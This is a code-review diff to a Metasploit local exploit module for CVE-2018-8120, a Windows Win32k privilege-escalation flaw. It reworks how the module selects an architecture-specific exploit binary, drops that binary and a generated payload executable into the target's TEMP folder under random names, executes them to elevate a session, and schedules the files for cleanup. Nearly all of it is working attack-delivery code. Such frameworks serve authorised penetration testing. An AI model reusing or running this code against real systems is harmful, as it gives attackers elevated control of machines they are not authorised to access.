addressed suggestions

modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
 
 
   def initialize(info={})
@@ -61,45 +62,33 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if sysinfo['OS'] =~ /XP/
+    if sysinfo['OS'] =~ /XP|NT/i
       fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
     end
   end
 
-  def write_exe_to_target(rexe, rexename)
+  def write_file_to_target(fname, data)
     begin
-      vprint_warning("Writing file to %TEMP%")
-      print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference")
-      temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
-      write_file_to_target(temprexe,rexe)
+      tempdir = session.sys.config.getenv('TEMP')
+      file_loc = "#{tempdir}\\#{fname}"
+      vprint_warning("Attempting to write #{fname} to #{tempdir}")
+      write_file(file_loc, data)
     rescue
-      fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful")
+      fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
     end
 
-    vprint_good("File path: #{temprexe}")
-    temprexe
-  end
-
-  def write_file_to_target(temprexe, rexe)
-    fd = session.fs.file.new(temprexe, "wb")
-    fd.write(rexe)
-    fd.close
-  end
-
-  def create_payload_from_file(exec)
-    vprint_status("Reading payload from file #{exec}")
-    File.read(exec)
+    vprint_good("#{fname} written")
+    file_loc
   end
 
   def check_arch
     sys_arch = sysinfo['Architecture']
     if sys_arch == ARCH_X86
       fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+      return 'CVE-2018-8120x86.exe'
 
     elsif sys_arch == ARCH_X64
-      return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
-
-      'CVE-2018-8120x64.exe'
+      return 'CVE-2018-8120x64.exe'
     else
       fail_with(Failure::BadConfig, "Invalid architecture")
     end
@@ -109,23 +98,25 @@ class MetasploitModule < Msf::Exploit::Local
     validate_target
     cve_fname = check_arch
     rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
-    raw = create_payload_from_file(rexe)
+    vprint_status("Reading payload from file #{rexe}")
+    raw = File.read(rexe)
 
     rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
     vprint_status("EXE's name is: #{rexename}")
     exe = generate_payload_exe
-    tempdir = session.sys.config.getenv('TEMP')
-    tempexename = Rex::Text.rand_text_alpha(6..14)
+    tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
 
-    cmd = "#{tempdir}\\#{tempexename}.exe"
-    vprint_status("Preparing payload at #{cmd}")
-    write_file(cmd, exe)
+    exe_payload = write_file_to_target(tempexename, exe)
     vprint_status("Payload uploaded to temp folder")
-    script_on_target = write_exe_to_target(raw, rexename)
-    command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
-    vprint_status("Location of CVE-2018-8120.exe is: #{command}")
+    cve_exe = write_file_to_target(rexename, raw)
+    command = "\"#{cve_exe}\" \"#{exe_payload}\""
+    vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
+    begin
+      register_file_for_cleanup(exe_payload)
+    rescue AccessDeniedError
+      print_error("Failed to delete file at #{cve_exe}")
+    end
 
-    command << " #{cmd}"
     vprint_status("Executing command : #{command}")
     cmd_exec_get_pid(command)
     print_good('Exploit finished, wait for privileged payload execution to complete.')